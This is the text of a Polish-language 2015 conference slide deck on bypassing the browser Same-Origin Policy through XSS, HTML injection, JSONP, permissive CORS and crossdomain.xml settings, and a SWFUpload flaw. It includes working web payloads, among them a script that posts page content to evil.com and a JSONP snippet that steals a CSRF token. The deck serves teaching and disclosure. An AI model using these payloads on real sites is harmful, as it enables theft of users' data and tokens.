4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek

Bypassing Same-Origin Policy
Jakub Żoczek
http://twitter.com/zoczus
jakub.zoczek@allegrogroup.com
zoczus@gmail.com

$ whoami
• Jakub Żoczek
• Specjalista ds. Bezpieczeństwa Systemów IT
• Security Researcher
• Bug Hunter
• http://zoczus.blogspot.com
• Hall of Fame:

Czym jest Same-Origin Policy?

•Ta sama domena
•Ten sam port
•Ten sam schemat

Dla strony http://example.com
URL Komentarz
http://example.com/admin/index.php
http://example.com/images/logo.png
https://example.com/admin/panel Inny schemat
http://example.com:8080/example.html Inny port
http://admin.example.com/index.php Inna domena

• Zwrotka AJAX
• Zawartość iframe
(document / window)
• <script> content
• <img> content

• <img src="(…)">
• <script src="(…)">
• <link href="(…)">

Cross-Site Scripting
<?php
echo '<h1> Wyniki wyszukiwania dla: ' .
$_GET['search'] . '</h1>'
// (...)
?>

/index.php?search=<script>alert(1);</script>

<html>
<body>

<script>
x=new XMLHttpRequest();
x.open("POST","http://evil.com/log_data", true);
x.send(btoa(document.body.innerHTML));
</script>

Cross-Site Scripting – uplaod plików
html / htm / shtml
<html>
<body>
<script>alert('XSS');</script>
</body>
</html>

xml/xsd/xsl/xhtml/rdf/svg/svgz
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert('XSS');
</script>
</svg>

swf / swfl
package {
import flash.display.Sprite;
public class xss extends Sprite {
public function xss() {
super();
ExternalInterface.call("alert('XSS')");
return;
}
}
}

HTML Injection
<?php
header("Content-Security-Policy: script-src 'self'; object-src
'self'; style-src 'self'");
header("Content-type: text/html; charset=utf-8");
$token = "2b9ee1db6d3989f5eec70e59ab211619";
echo "<br>XSS-free Content Here " . $str;
echo "<br>Your token: " . $token;
echo "<script>var x = 'test';</script>”;
echo "</body></html>"
?>

HTML Injection

HTML Injection
root@ropchain:/var/log/apache2# cat access.log| grep token
213.17.226.11 - - [15/Apr/2015:16:51:57 +0200] "GET
/%3Cbr%3EYour%20token:%202b9ee1db6d3989f5eec70e59ab21161
9%3Cscript%3Evar%20x%20= HTTP/1.0" 404 553
"http://lab.ropchain.org/tmp/u.php?str=%3Cimg%20src=%27http://ropchai
n.org/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0"

JSON
http://hostname/whoami
{
"logged_in":true,
"login":"victim",
"csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba"
}

JSON
http://evil.com
<script src="http://hostname/whoami"></script>

JSONP
http://hostname/whoami?callback=xx
xx({
"logged_in":true,
"login":"victim",
"csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba"
});

JSONP
http://evil.com
<script>xx=function(x){alert(x.csrf);}</script>
<script src="http://hostname/whoami?callback=xx"></script>

Access-Control-Allow-Origin
HTTP/1.0 200 OK
Date: Thu, 16 Apr 2015 08:50:19 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: http://lab.ropchain.org
Content-Encoding: gzip
Content-Length: 1509
Content-Type: text/html; charset=utf-8

Access-Control-Allow-Origin
HTTP/1.0 200 OK
Date: Thu, 16 Apr 2015 08:50:19 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 1509
Content-Type: text/html; charset=utf-8

Safari

Flash

Flash – crossdomain.xml
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.domain.com" secure="false"/>
</cross-domain-policy>

Flash – crossdomain.xml
http://domain.com/crossdomain.xml
<?xml version="1.0" encoding="UTF-8"?>
<allow-access-from domain="*" secure="false"/>

http://etsy.com - demo
https://www.youtube.com/watch?v=yuOiDqpxKow

Flash – Security.allowDomain("*")

SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
• Security.allowDomain("*")
• Kontrolujemy adres URL do uploadu
• Kontrolujemy callback do zwrotki o statusie uploadu
• W callbacku otrzymujemy content dokumentu
• …
• PROFIT!

SWFUpload - CVE-2013-2205 (© Szymon Gruszecki)
private function UploadSuccess(file: FileItem, serverData:
String, responseReceived: Boolean = true): void {
// (…)
ExternalCall.UploadSuccess(this.uploadSuccess_Callback,
file.ToJavaScriptObject(), serverData, responseReceived);
this.UploadComplete(false);
}

www.paypal.com/crossdomain.xml:
advertising.paypal.com/(...)/swfupload.swf - PODATNY
:-)
<?xml version="1.0"?>

<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.paypalobjects.com" />

http://paypal.com - demo
https://www.youtube.com/watch?v=-3Qgwi9rAfY

public function cleanEIString(arg1: String): String {
return arg1.replace(new RegExp("[^A-Za-z0-9_.]", "gi"), "");
}
// (…)
if (loaderInfo.parameters.readyFunction != undefined) {
ExternalInterface.call(
_app.model.cleanEIString(readyFunction),
ExternalInterface.objectID
);
}

SAME
ORIGIN
METHOD
EXECUTION

Same Origin Method Execution

http://yammer.com - demo
https://www.youtube.com/watch?v=J0f_sKpUak0

Pytania?
Jakub Żoczek (jakub.zoczek@allegrogroup.com)
http://zoczus.blogspot.com
http://twitter.com/

4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to 4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek

Similar to 4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek (20)

Recently uploaded

Recently uploaded (20)

4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek